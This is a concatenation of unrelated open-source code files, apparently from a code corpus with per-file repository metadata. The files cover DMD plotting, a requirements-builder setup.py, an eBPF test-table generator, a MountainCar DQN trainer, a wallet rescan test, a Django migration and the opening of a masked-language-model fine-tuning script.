fig41.savefig(outd+'/O_SEA_'+sc+'th-InvariantMode.png',bbox_inches='tight', pad_inches = 0, transparent=True)
#plt.title(sc+'-th Damage Mode')
#fig=plt.figure()
#ax=fig.add_subplot(111)
#colorbar_ax=fig.add_axes([0.7,0.1,0.05,0.8])
#fig.colorbar(mpb)
return None
def MakeImagePred(P,col,s1,eps,outd):
fig41=plt.figure()
ax41=fig41.add_subplot(111)
p=P.reshape(s1)
sav=real(p.flatten().mean())
p0=p #Energy(p).reshape(s1)
rp0=real(p0)
print(rp0.flatten().mean(),rp0.flatten().max())
mpb=plt.imshow(rp0)
plt.clim(-.1,.1)
plt.axis('off')
ax41.set_yticklabels([])
ax41.set_xticklabels([])
sc=str(format(eps,'.0e'))[:]
#fig41.savefig('O_'+sc+'th-StepInvariant.png',bbox_inches='tight', pad_inches = 0, transparent=True)
plt.colorbar(mpb)#,extend='both')
fig41.savefig(outd+'/O_SEA_'+sc+'th-StepStrainInvariant_WithCbar.png',bbox_inches='tight', pad_inches = 0, transparent=True)
#plt.title(' Damage Field '+r'$\phi$'+' at '+r'$\epsilon=$'+sc)
return sav
def MakePlot_SV(Sig,r,outd):
####Plotting
fig2=plt.figure()
ax2=fig2.add_subplot(111)
ax2.plot(Sig,'s',markersize=20)
ax2.set_xlabel('index '+r'$j$')
ax2.set_ylabel(r'$\varsigma_j$')
ax2.set_xlim((-0.2,r))
fig2.tight_layout()
fig2.savefig(outd+'/O_SEA_SV.png',bbox_inches='tight', pad_inches = 0, transparent=True)
############
return fig2,ax2
def MakePlot_Eigen(mu,outd):
t0 = np.linspace(0, 2*pi, 20)
fig3=plt.figure()
ax3=fig3.add_subplot(111)
ax3.plot(real(mu),imag(mu),'s',markersize=20)
ax3.plot(cos(t0), sin(t0),'--')
ax3.set_xlabel(r'$Re(\mu)$')
ax3.set_ylabel(r'$Im(\mu)$')
fig3.tight_layout()
fig3.savefig(outd+'/O_SEA_Eigen.png',bbox_inches='tight', pad_inches = 0, transparent=True)
return fig3,ax3,t0
def Predict(Phi,b,mu,s,t,r,outd):
print(t,'--t')
dt=t[1]-t[0]
tmin=min(t)
tmax=max(t)
t2 = np.linspace(tmin, tmax, num_pred)
Psi = np.zeros([r, len(t2)], dtype='complex')
for i,_x in enumerate(t2):
print(_x,'_x')
print(b,'b')
print(i)
print(shape(Psi))
Psi[:,i] = multiply(power(mu, _x/dt), b)
# compute DMD reconstruction
D2 = dot(Phi, Psi)
#np.allclose(D, D2) # True
sigmaps=[]
tps=[]
for i in range(len(D2[0,:])):
print(str(i)+'--predicted...'+str(t2[i]))
F=D2[:,i]
if i==0: #subtract background
F0=average(F)
eps=t2[i]
sigma=MakeImagePred((F-F0),i,s,eps,outd)
tps.append(t2[i])
sigmaps.append(sigma+eps)
return tps,sigmaps
def Perform_and_PredictFuture(D0,eps,s,outd):
D=D0.T #Data Matrix
X=D[:,:-1]
Y=D[:,1:]
# SVD of input matrix
U2,Sig2,Vh2 = svd(X, False)
r = 5 # rank-5 truncation
fig_SV,ax_SV=MakePlot_SV(Sig2,r,outd)
U = U2[:,:r]
Sig = diag(Sig2)[:r,:r]
V = Vh2.conj().T[:,:r]
# build A tilde
Atil = dot(dot(dot(U.conj().T, Y), V), inv(Sig))
mu,W = eig(Atil)
fig_Eigen,ax_Eigen,t0=MakePlot_Eigen(mu,outd)
# build DMD modes
Phi = dot(dot(dot(Y, V), inv(Sig)), W)
MakeImage(Phi,0,s,outd)
MakeImage(Phi,1,s,outd)
MakeImage(Phi,2,s,outd)
MakeImage(Phi,3,s,outd)
# compute time evolution
b = dot(pinv(Phi), X[:,1])
tps,sigmaps=Predict(Phi,b,mu,s,eps,r,outd)
return tps,sigmaps
| 33.323741 | 128 | 0.614961 |
1f3fcca34de84aa8bf6265a50647d694d96fc92e | 2,475 | py | Python | setup.py | cclauss/requirements-builder | ec2e84b974290aaefa71b5ce19d0c343d29efffa | [
"BSD-3-Clause"
] | null | null | null | setup.py | cclauss/requirements-builder | ec2e84b974290aaefa71b5ce19d0c343d29efffa | [
"BSD-3-Clause"
] | null | null | null | setup.py | cclauss/requirements-builder | ec2e84b974290aaefa71b5ce19d0c343d29efffa | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# This file is part of Requirements-Builder
# Copyright (C) 2015, 2016, 2017, 2018 CERN.
#
# Requirements-Builder is free software; you can redistribute it and/or
# modify it under the terms of the Revised BSD License; see LICENSE
# file for more details.
#
"""Build requirements files from setup.py requirements."""
import os
from setuptools import setup
# Get the version string. Cannot be done with import!
g = {}
with open(os.path.join('requirements_builder', 'version.py'), 'rt') as fp:
exec(fp.read(), g)
version = g['__version__']
with open('README.rst') as readme_file:
readme = readme_file.read()
with open('CHANGES.rst') as history_file:
history = history_file.read().replace('.. :changes:', '')
install_requires = [
'click>=6.1.0',
'mock>=1.3.0',
]
tests_require = [
'check-manifest>=0.25',
'coverage>=4.0',
'isort>=4.0.0',
'pydocstyle>=1.0.0',
'pytest-cache>=1.0',
'pytest-cov>=2.0.0',
'pytest-pep8>=1.0.6',
'pytest>=2.8.0',
]
extras_require = {
'docs': [
'Sphinx<1.5.0,>=1.4.2',
'docutils<0.13,>=0.12',
],
'tests': tests_require,
}
extras_require['all'] = extras_require['tests'] + extras_require['docs']
setup_requires = ['pytest-runner>=2.6.2', ]
setup(
name='requirements-builder',
version=version,
description=__doc__,
long_description=readme + '\n\n' + history,
author="Invenio Collaboration",
author_email='info@inveniosoftware.org',
url='https://github.com/inveniosoftware/requirements-builder',
entry_points={
'console_scripts':
["requirements-builder = requirements_builder.cli:cli"]
},
packages=['requirements_builder', ],
include_package_data=True,
extras_require=extras_require,
install_requires=install_requires,
setup_requires=setup_requires,
tests_require=tests_require,
license='BSD',
zip_safe=False,
keywords='requirements-builder',
classifiers=[
'Intended Audience :: Developers',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
"Programming Language :: Python :: 2",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
)
| 27.5 | 74 | 0.63596 |
2666542ec3037f792e3650bf4b928959ac13f8c9 | 5,743 | py | Python | backends/ebpf/targets/ebpfstf.py | Abe149/p4c | 4a40ce4a15957de76e3a161c3778f1f0b6ac5780 | [
"Apache-2.0"
] | null | null | null | backends/ebpf/targets/ebpfstf.py | Abe149/p4c | 4a40ce4a15957de76e3a161c3778f1f0b6ac5780 | [
"Apache-2.0"
] | null | null | null | backends/ebpf/targets/ebpfstf.py | Abe149/p4c | 4a40ce4a15957de76e3a161c3778f1f0b6ac5780 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# Copyright 2018 VMware, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Converts the commands in an stf file which populate tables into a C
program that manipulates ebpf tables. """
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + '/../../tools')
from testutils import *
from stf.stf_parser import STFParser
class eBPFCommand(object):
""" Defines a match-action command for eBPF programs"""
def __init__(self, a_type, table, action, priority="", match=[], extra=""):
self.a_type = a_type # dir in which all files are stored
self.table = table # contains meta information
self.action = action # contains meta information
self.priority = priority # template to generate a filter
self.match = match # contains standard and error output
self.extra = extra # could also be "pcapng"
def _generate_control_actions(cmds):
""" Generates the actual control plane commands.
This function inserts C code for all the "add" commands that have
been parsed. """
generated = ""
for index, cmd in enumerate(cmds):
key_name = "key_%s%d" % (cmd.table, index)
value_name = "value_%s%d" % (cmd.table, index)
if cmd.a_type == "setdefault":
tbl_name = cmd.table + "_defaultAction"
generated += "u32 %s = 0;\n\t" % (key_name)
else:
generated += "struct %s_key %s = {};\n\t" % (cmd.table, key_name)
tbl_name = cmd.table
for key_num, key_field in enumerate(cmd.match):
field = key_field[0].split('.')[1]
generated += ("%s.%s = %s;\n\t"
% (key_name, field, key_field[1]))
generated += ("tableFileDescriptor = "
"BPF_OBJ_GET(MAP_PATH \"/%s\");\n\t" %
tbl_name)
generated += ("if (tableFileDescriptor < 0) {"
"fprintf(stderr, \"map %s not loaded\");"
" exit(1); }\n\t" % tbl_name)
generated += ("struct %s_value %s = {\n\t\t" % (
cmd.table, value_name))
if cmd.action[0] == "_NoAction":
generated += ".action = 0,\n\t\t"
else:
action_full_name = "{}_ACT_{}".format(cmd.table.upper(), cmd.action[0].upper())
generated += ".action = %s,\n\t\t" % action_full_name
generated += ".u = {.%s = {" % cmd.action[0]
for val_num, val_field in enumerate(cmd.action[1]):
generated += "%s," % val_field[1]
generated += "}},\n\t"
generated += "};\n\t"
generated += ("ok = BPF_USER_MAP_UPDATE_ELEM"
"(tableFileDescriptor, &%s, &%s, BPF_ANY);\n\t"
% (key_name, value_name))
generated += ("if (ok != 0) { perror(\"Could not write in %s\");"
"exit(1); }\n" % tbl_name)
return generated
def create_table_file(actions, tmpdir, file_name):
""" Create the control plane file.
The control commands are provided by the stf parser.
This generated file is required by ebpf_runtime.c to initialize
the control plane. """
err = ""
try:
with open(tmpdir + "/" + file_name, "w+") as control_file:
control_file.write("#include \"test.h\"\n\n")
control_file.write("static inline void setup_control_plane() {")
control_file.write("\n\t")
control_file.write("int ok;\n\t")
control_file.write("int tableFileDescriptor;\n\t")
generated_cmds = _generate_control_actions(actions)
control_file.write(generated_cmds)
control_file.write("}\n")
except OSError as e:
err = e
return FAILURE, err
return SUCCESS, err
def parse_stf_file(raw_stf):
""" Uses the .stf parsing tool to acquire a pre-formatted list.
Processing entries according to their specified cmd. """
parser = STFParser()
stf_str = raw_stf.read()
stf_map, errs = parser.parse(stf_str)
input_pkts = {}
cmds = []
expected = {}
for stf_entry in stf_map:
if stf_entry[0] == "packet":
input_pkts.setdefault(stf_entry[1], []).append(bytes.fromhex(''.join(stf_entry[2].split())))
elif stf_entry[0] == "expect":
interface = int(stf_entry[1])
pkt_data = stf_entry[2]
expected.setdefault(interface, {})
if pkt_data != '':
expected[interface]["any"] = False
expected[interface].setdefault(
"pkts", []).append(pkt_data)
else:
expected[interface]["any"] = True
elif stf_entry[0] == "add":
cmd = eBPFCommand(
a_type=stf_entry[0], table=stf_entry[1],
priority=stf_entry[2], match=stf_entry[3],
action=stf_entry[4], extra=stf_entry[5])
cmds.append(cmd)
elif stf_entry[0] == "setdefault":
cmd = eBPFCommand(
a_type=stf_entry[0], table=stf_entry[1], action=stf_entry[2])
cmds.append(cmd)
return input_pkts, cmds, expected
| 41.615942 | 104 | 0.58001 |
2a77aa3a4fd9eea90d9ccee3698d69828f3f2a0c | 11,685 | py | Python | mtcar-lossgraph/mountaincar-solver-lossgraph.py | hushon/son-dqn | 08b9bdce8b570a629b8484d21b06146335f5907e | [
"Apache-2.0"
] | null | null | null | mtcar-lossgraph/mountaincar-solver-lossgraph.py | hushon/son-dqn | 08b9bdce8b570a629b8484d21b06146335f5907e | [
"Apache-2.0"
] | null | null | null | mtcar-lossgraph/mountaincar-solver-lossgraph.py | hushon/son-dqn | 08b9bdce8b570a629b8484d21b06146335f5907e | [
"Apache-2.0"
] | null | null | null | ## Original implementation from https://github.com/ageron/tiny-dqn
## Edited to solve OpenAI Gym classic environments by github.com/hushon
from __future__ import division, print_function, unicode_literals
# Handle arguments (before slow imports so --help can be fast)
import argparse
parser = argparse.ArgumentParser(
description="Train a DQN net to play OpenAI Gym classic environments.")
parser.add_argument("-e", "--environment", action="store", default="MountainCar-v0",
help="name of the Gym environment")
parser.add_argument("-n", "--number-steps", type=int, default=10000,
help="total number of training steps")
parser.add_argument("-l", "--learn-iterations", type=int, default=1,
help="number of game iterations between each training step")
parser.add_argument("-s", "--save-steps", type=int, default=400,
help="number of training steps between saving checkpoints")
parser.add_argument("-c", "--copy-steps", type=int, default=20,
help="number of training steps between copies of online DQN to target DQN")
parser.add_argument("-r", "--render", action="store_true", default=False,
help="render the game during training or testing")
parser.add_argument("-p", "--path", default="./MountainCar-v0/my_dqn.ckpt",
help="path of the checkpoint file")
parser.add_argument("-t", "--test", action="store_true", default=False,
help="test (no learning and minimal epsilon)")
parser.add_argument("-v", "--verbosity", action="count", default=0,
help="increase output verbosity")
args = parser.parse_args()
from time import sleep
from collections import deque
import gym
from gym import wrappers
import numpy as np
import os
import tensorflow as tf
import matplotlib.pyplot as plt
env = gym.make(args.environment)
if args.test: env = wrappers.Monitor(env, args.path+'/mountaincar-experiment-1')
done = True # env needs to be reset
# First let's build the two DQNs (online & target)
n_outputs = env.action_space.n # 3 discrete actions are available
num_outputs_list = [1024, 512] # number of units in input layer and hidden layer
activation_list = [tf.nn.relu, tf.nn.relu] # activation function in input layer and hidden layer
weights_initializer = tf.contrib.layers.xavier_initializer()
# biases_initializer = tf.zeros_initializer()
biases_initializer = tf.contrib.layers.xavier_initializer()
def q_network(X_state, name):
prev_layer = X_state
with tf.variable_scope(name) as scope:
# input layer and hidden layers
for num_outputs, activation in zip(num_outputs_list, activation_list):
prev_layer = tf.contrib.layers.fully_connected(
prev_layer,
num_outputs,
activation_fn=activation,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=weights_initializer,
weights_regularizer=None,
biases_initializer=biases_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None)
# output layer
outputs = tf.contrib.layers.fully_connected(
prev_layer,
n_outputs,
activation_fn=None,
normalizer_fn=None,
normalizer_params=None,
weights_initializer=weights_initializer,
weights_regularizer=None,
biases_initializer=biases_initializer,
biases_regularizer=None,
reuse=None,
variables_collections=None,
outputs_collections=None,
trainable=True,
scope=None)
trainable_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES,
scope=scope.name)
trainable_vars_by_name = {var.name[len(scope.name):]: var
for var in trainable_vars}
return outputs, trainable_vars_by_name
# state_shape = (2*np.prod(env.observation_space.shape), )
state_shape = (np.prod(env.observation_space.shape), )
X_state = tf.placeholder(tf.float32, shape=[None]+list(state_shape))
online_q_values, online_vars = q_network(X_state, name="q_networks/online")
target_q_values, target_vars = q_network(X_state, name="q_networks/target")
# We need an operation to copy the online DQN to the target DQN
copy_ops = [target_var.assign(online_vars[var_name])
for var_name, target_var in target_vars.items()]
copy_online_to_target = tf.group(*copy_ops)
# Now for the training operations
learning_rate = 0.2
momentum = 0.0
with tf.variable_scope("train"):
X_action = tf.placeholder(tf.int32, shape=[None])
y = tf.placeholder(tf.float32, shape=[None, 1])
q_value = tf.reduce_sum(online_q_values * tf.one_hot(X_action, n_outputs), axis=1, keep_dims=True)
error = tf.abs(y - q_value)
# clipped_error = tf.clip_by_value(error, 0.0, 1.0)
# linear_error = 2 * (error - clipped_error)
# loss = tf.reduce_mean(tf.square(clipped_error) + linear_error)
loss = tf.reduce_mean(tf.square(error))
global_step = tf.Variable(0, trainable=False, name='global_step')
optimizer = tf.train.MomentumOptimizer(
learning_rate, momentum, use_nesterov=True)
training_op = optimizer.minimize(loss, global_step=global_step)
init = tf.global_variables_initializer()
saver = tf.train.Saver()
# Let's implement a simple replay memory
# replay_memory_size = 20000
replay_memory_size = 50000
replay_memory = deque([], maxlen=replay_memory_size)
def sample_memories(batch_size):
indices = np.random.permutation(len(replay_memory))[:batch_size]
cols = [[], [], [], [], []] # state, action, reward, next_state, continue
for idx in indices:
memory = replay_memory[idx]
for col, value in zip(cols, memory):
col.append(value)
cols = [np.array(col) for col in cols]
return (cols[0], cols[1], cols[2].reshape(-1, 1), cols[3], cols[4].reshape(-1, 1))
# And on to the epsilon-greedy policy with decaying epsilon
eps_min, eps_max = (0.5, 1.0) if not args.test else (0.0, 0.0)
eps_decay_steps = args.number_steps // 2
# eps_decay_steps = args.number_steps
def epsilon_greedy(q_values, step):
epsilon = max(eps_min, eps_max - (eps_max-eps_min) * step/eps_decay_steps)
if np.random.rand() < epsilon:
print("random")
return np.random.randint(n_outputs) # random action
else:
return np.argmax(q_values) # optimal action
# We need to preprocess the images to speed up training
# preprocessor merges observations and returnes a flattened array
def preprocess_observation(*arg):
obs_stacked = np.vstack(arg)
obs_stacked = np.around(obs_stacked, decimals=4)
# q = 0.01
# obs_stacked = q*np.round(obs_stacked/q)
return obs_stacked.reshape(-1)
# TensorFlow - Execution phase
training_start = 0 # start training after 10,000 game iterations
discount_rate = 1.00
skip_start = 0 # Skip the start of every game (it's just waiting time).
batch_size = 500
iteration = 0 # game iterations
done = True # env needs to be reset
# We will keep track of the max Q-Value over time and compute the mean per game
loss_val = np.infty
game_length = 0
total_max_q = 0
mean_max_q = 0.0
# flag for successful game
success = False
# flag for intrinsic reward
check1 = False
check2 = False
check3 = False
# frame skipping by k frames
skip_k = 10
# for plotting loss
plt.figure(1)
loss_list = np.zeros(args.number_steps)
with tf.Session() as sess:
if os.path.isfile(args.path + ".index"):
saver.restore(sess, args.path)
else:
init.run()
copy_online_to_target.run()
while True:
step = global_step.eval()
if step >= args.number_steps and not args.test:
break
iteration += 1
if args.verbosity > 0:
print("\rIteration {} Training step {}/{} ({:.1f})% Loss {:5f} Mean Max-Q {:5f} ".format(
iteration, step, args.number_steps, step * 100 / args.number_steps, loss_val, mean_max_q), end="")
if done: # game over, start again
print("Game Over")
obs = env.reset()
for skip in range(skip_start): # skip the start of each game
obs, reward, done, info = env.step(0)
# state = preprocess_observation(obs, obs)
state = preprocess_observation(obs)
obs_old = obs
if args.render:
env.render()
# Online DQN evaluates what to do
print(state)
q_values = online_q_values.eval(feed_dict={X_state: [state]})
print(q_values)
action = epsilon_greedy(q_values, step)
print(("left", "stay", "right")[action])
# Online DQN plays
# for k in range(skip_k):
# obs, reward, done, info = env.step(action)
# if reward > -1.0:
# break
obs, reward, done, info = env.step(action)
# next_state = preprocess_observation(obs, obs_old)
next_state = preprocess_observation(obs)
obs_old = obs
# flag for success
if obs[0]-4.9 >= 0:
success=True
done = True
reward = 100.0
if success:
print("successful episode observed")
# reward manipulation
# coeff = -1e3
# reward += coeff*(state[0]-state[2])*(-1,0,1)[action]
# print(reward)
# coeff = 1e5
# reward += coeff*np.square(state[3])
# print(reward)
# coeff=4
# intrinsic_reward = coeff*(np.square(state[0]+0.5)+160.0*np.square(state[1]))
# print(intrinsic_reward)
# reward += intrinsic_reward
# if not check1 and not check2 and not check3 and obs[0]<-0.7:
# reward = 0.0
# check1 = True
# elif check1 and not check2 and not check3 and obs[0]>-0.3:
# reward = 0.0
# check2 = True
# elif check1 and check2 and not check3 and obs[0]>0.0:
# reward = 0.0
# check3 = True
# Let's memorize what happened
replay_memory.append((state, action, reward, next_state, 1.0 - done))
state = next_state
if args.test:
continue
# Compute statistics for tracking progress (not shown in the book)
total_max_q += q_values.max()
game_length += 1
if done:
mean_max_q = total_max_q / game_length
total_max_q = 0.0
game_length = 0
if iteration > training_start and iteration % args.learn_iterations == 0:
# only train after warmup period and at regular intervals
# Sample memories and use the target DQN to produce the target Q-Value
X_state_val, X_action_val, rewards, X_next_state_val, continues = (sample_memories(batch_size))
next_q_values = target_q_values.eval(feed_dict={X_state: X_next_state_val})
max_next_q_values = np.max(next_q_values, axis=1, keepdims=True)
y_val = rewards + continues * discount_rate * max_next_q_values
# Train the online DQN
_, loss_val = sess.run([training_op, loss], feed_dict={X_state: X_state_val, X_action: X_action_val, y: y_val})
loss_list[step] = loss_val
# Regularly copy the online DQN to the target DQN
if step % args.copy_steps == 0:
copy_online_to_target.run()
# And save regularly
if step % args.save_steps == 0:
saver.save(sess, args.path)
plt.plot(np.arange(args.number_steps), loss_list)
plt.savefig('./MountainCar-v0/loss_chart.png') | 38.820598 | 123 | 0.653059 |
ab09950d7f6955e84d0ecf8c7fc0aa0c515b90d8 | 8,481 | py | Python | test/functional/wallet_import_rescan.py | reeccoin/REEC | eb388d692aa7039dfe78247c829e4d348ff1f631 | [
"MIT"
] | 2 | 2020-11-28T13:09:16.000Z | 2020-12-05T21:01:07.000Z | test/functional/wallet_import_rescan.py | reeccoin/REEC | eb388d692aa7039dfe78247c829e4d348ff1f631 | [
"MIT"
] | null | null | null | test/functional/wallet_import_rescan.py | reeccoin/REEC | eb388d692aa7039dfe78247c829e4d348ff1f631 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test wallet import RPCs.
Test rescan behavior of importaddress, importpubkey, importprivkey, and
importmulti RPCs with different types of keys and rescan options.
In the first part of the test, node 0 creates an address for each type of
import RPC call and sends BTC to it. Then other nodes import the addresses,
and the test makes listtransactions and getbalance calls to confirm that the
importing node either did or did not execute rescans picking up the send
transactions.
In the second part of the test, node 0 sends more BTC to each address, and the
test makes more listtransactions and getbalance calls to confirm that the
importing nodes pick up the new transactions regardless of whether rescans
happened previously.
"""
from test_framework.test_framework import ReeccoinTestFramework
from test_framework.util import (assert_raises_rpc_error, connect_nodes, sync_blocks, assert_equal, set_node_times)
import collections
import enum
import itertools
Call = enum.Enum("Call", "single")
Data = enum.Enum("Data", "address pub priv")
Rescan = enum.Enum("Rescan", "no yes late_timestamp")
class Variant(collections.namedtuple("Variant", "call data rescan prune")):
"""Helper for importing one key and verifying scanned transactions."""
def try_rpc(self, func, *args, **kwargs):
if self.expect_disabled:
assert_raises_rpc_error(-4, "Rescan is disabled in pruned mode", func, *args, **kwargs)
else:
return func(*args, **kwargs)
def do_import(self, timestamp):
"""Call one key import RPC."""
rescan = self.rescan == Rescan.yes
if self.call == Call.single:
if self.data == Data.address:
response = self.try_rpc(self.node.importaddress, self.address["address"], self.label, rescan)
elif self.data == Data.pub:
response = self.try_rpc(self.node.importpubkey, self.address["pubkey"], self.label, rescan)
elif self.data == Data.priv:
response = self.try_rpc(self.node.importprivkey, self.key, self.label, rescan)
assert_equal(response, None)
elif self.call == Call.multi:
response = self.node.importmulti([{
"scriptPubKey": {
"address": self.address["address"]
},
"timestamp": timestamp + TIMESTAMP_WINDOW + (1 if self.rescan == Rescan.late_timestamp else 0),
"pubkeys": [self.address["pubkey"]] if self.data == Data.pub else [],
"keys": [self.key] if self.data == Data.priv else [],
"label": self.label,
"watchonly": self.data != Data.priv
}], {"rescan": self.rescan in (Rescan.yes, Rescan.late_timestamp)})
assert_equal(response, [{"success": True}])
def check(self, txid=None, amount=None, confirmations=None):
"""Verify that listreceivedbyaddress returns return expected values."""
addresses = self.node.listreceivedbyaddress(0, True, self.address['address'])
if self.expected_txs:
assert_equal(len(addresses[0]["txids"]), self.expected_txs)
if txid is not None:
address, = [ad for ad in addresses if txid in ad["txids"]]
assert_equal(address["address"], self.address["address"])
assert_equal(address["amount"], self.expected_balance)
assert_equal(address["confirmations"], confirmations)
# Verify the transaction is correctly marked watchonly depending on
# whether the transaction pays to an imported public key or
# imported private key. The test setup ensures that transaction
# inputs will not be from watchonly keys (important because
# involvesWatchonly will be true if either the transaction output
# or inputs are watchonly).
if self.data != Data.priv:
assert_equal(address["involvesWatchonly"], True)
else:
assert_equal("involvesWatchonly" not in address, True)
# List of Variants for each way a key or address could be imported.
IMPORT_VARIANTS = [Variant(*variants) for variants in itertools.product(Call, Data, Rescan, (False, True))]
# List of nodes to import keys to. Half the nodes will have pruning disabled,
# half will have it enabled. Different nodes will be used for imports that are
# expected to cause rescans, and imports that are not expected to cause
# rescans, in order to prevent rescans during later imports picking up
# transactions associated with earlier imports. This makes it easier to keep
# track of expected balances and transactions.
ImportNode = collections.namedtuple("ImportNode", "prune rescan")
IMPORT_NODES = [ImportNode(*fields) for fields in itertools.product((False, True), repeat=2)]
# Rescans start at the earliest block up to 2 hours before the key timestamp.
TIMESTAMP_WINDOW = 2 * 60 * 60
class ImportRescanTest(ReeccoinTestFramework):
def set_test_params(self):
self.num_nodes = 2 + len(IMPORT_NODES)
def setup_network(self):
extra_args = [["-addresstype=legacy",] for _ in range(self.num_nodes)]
for i, import_node in enumerate(IMPORT_NODES, 2):
if import_node.prune:
extra_args[i] += ["-prune=1"]
self.add_nodes(self.num_nodes, extra_args)
self.start_nodes()
for i in range(1, self.num_nodes):
connect_nodes(self.nodes[i], 0)
def run_test(self):
# Create one transaction on node 0 with a unique amount for
# each possible type of wallet import RPC.
for i, variant in enumerate(IMPORT_VARIANTS):
variant.address = self.nodes[1].validateaddress(self.nodes[1].getnewaddress())
variant.key = self.nodes[1].dumpprivkey(variant.address["address"])
variant.initial_amount = 10 - (i + 1) / 4.0
variant.initial_txid = self.nodes[0].sendtoaddress(variant.address["address"], variant.initial_amount)
# Generate a block containing the initial transactions, then another
# block further in the future (past the rescan window).
self.nodes[0].generate(1)
assert_equal(self.nodes[0].getrawmempool(), [])
timestamp = self.nodes[0].getblockheader(self.nodes[0].getbestblockhash())["time"]
set_node_times(self.nodes, timestamp + TIMESTAMP_WINDOW + 1)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
# For each variation of wallet key import, invoke the import RPC and
# check the results from getbalance and listtransactions.
for variant in IMPORT_VARIANTS:
variant.expect_disabled = variant.rescan == Rescan.yes and variant.prune and variant.call == Call.single
expect_rescan = variant.rescan == Rescan.yes and not variant.expect_disabled
variant.node = self.nodes[2 + IMPORT_NODES.index(ImportNode(variant.prune, expect_rescan))]
variant.do_import(timestamp)
if expect_rescan:
variant.expected_balance = variant.initial_amount
variant.expected_txs = 1
variant.check(variant.initial_txid, variant.initial_amount, 2)
else:
variant.expected_balance = 0
variant.expected_txs = 0
variant.check()
# Create new transactions sending to each address.
for i, variant in enumerate(IMPORT_VARIANTS):
variant.sent_amount = 10 - (2 * i + 1) / 8.0
variant.sent_txid = self.nodes[0].sendtoaddress(variant.address["address"], variant.sent_amount)
# Generate a block containing the new transactions.
self.nodes[0].generate(1)
assert_equal(self.nodes[0].getrawmempool(), [])
sync_blocks(self.nodes)
# Check the latest results from getbalance and listtransactions.
for variant in IMPORT_VARIANTS:
if not variant.expect_disabled:
variant.expected_balance += variant.sent_amount
variant.expected_txs += 1
variant.check(variant.sent_txid, variant.sent_amount, 1)
else:
variant.check()
if __name__ == "__main__":
ImportRescanTest().main()
| 47.379888 | 116 | 0.666431 |
3a2950318764046c328bae914582abfee31aa3e2 | 445 | py | Python | apps/exams/migrations/0010_auto_20200410_1559.py | alfarhanzahedi/edumate | 76ced0063d25431098babb1d163c95c9ddaf3307 | [
"MIT"
] | 1 | 2021-11-28T14:18:16.000Z | 2021-11-28T14:18:16.000Z | apps/exams/migrations/0010_auto_20200410_1559.py | alfarhanzahedi/edumate | 76ced0063d25431098babb1d163c95c9ddaf3307 | [
"MIT"
] | 1 | 2022-02-10T10:53:12.000Z | 2022-02-10T10:53:12.000Z | apps/exams/migrations/0010_auto_20200410_1559.py | alfarhanzahedi/edumate | 76ced0063d25431098babb1d163c95c9ddaf3307 | [
"MIT"
] | null | null | null | # Generated by Django 2.2.8 on 2020-04-10 15:59
import ckeditor_uploader.fields
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('exams', '0009_auto_20200410_1526'),
]
operations = [
migrations.AlterField(
model_name='answer',
name='body',
field=ckeditor_uploader.fields.RichTextUploadingField(blank=True, null=True),
),
]
| 22.25 | 89 | 0.640449 |
9c9b0c088becdb658f77557dc352e8951ef478fd | 86 | py | Python | lanfactory/__init__.py | AlexanderFengler/LANfactory | 78570d488c64907ef7dcf2161581a03746d0e45b | [
"MIT"
] | 1 | 2021-07-15T03:49:28.000Z | 2021-07-15T03:49:28.000Z | lanfactory/__init__.py | AlexanderFengler/LANfactory | 78570d488c64907ef7dcf2161581a03746d0e45b | [
"MIT"
] | null | null | null | lanfactory/__init__.py | AlexanderFengler/LANfactory | 78570d488c64907ef7dcf2161581a03746d0e45b | [
"MIT"
] | null | null | null | __version__ = '0.0.2'
from . import config
from . import trainers
from . import utils | 17.2 | 22 | 0.732558 |
bbcced59a030fde0ab77438bbf6a9c57daa000d4 | 24,177 | py | Python | examples/pytorch/language-modeling/run_mlm.py | InfluencerNGZK/transformers | 33080a0a29f849649ade9ef351d5744b5b0ddefe | [
"Apache-2.0"
] | null | null | null | examples/pytorch/language-modeling/run_mlm.py | InfluencerNGZK/transformers | 33080a0a29f849649ade9ef351d5744b5b0ddefe | [
"Apache-2.0"
] | null | null | null | examples/pytorch/language-modeling/run_mlm.py | InfluencerNGZK/transformers | 33080a0a29f849649ade9ef351d5744b5b0ddefe | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Team All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for masked language modeling (BERT, ALBERT, RoBERTa...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=masked-lm
"""
# You can also adapt this script on your own masked language modeling task. Pointers for this are left as comments.
import logging
import math
import os
import sys
from dataclasses import dataclass, field
from typing import Optional
import datasets
from datasets import load_dataset
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_MASKED_LM_MAPPING,
AutoConfig,
AutoModelForMaskedLM,
AutoTokenizer,
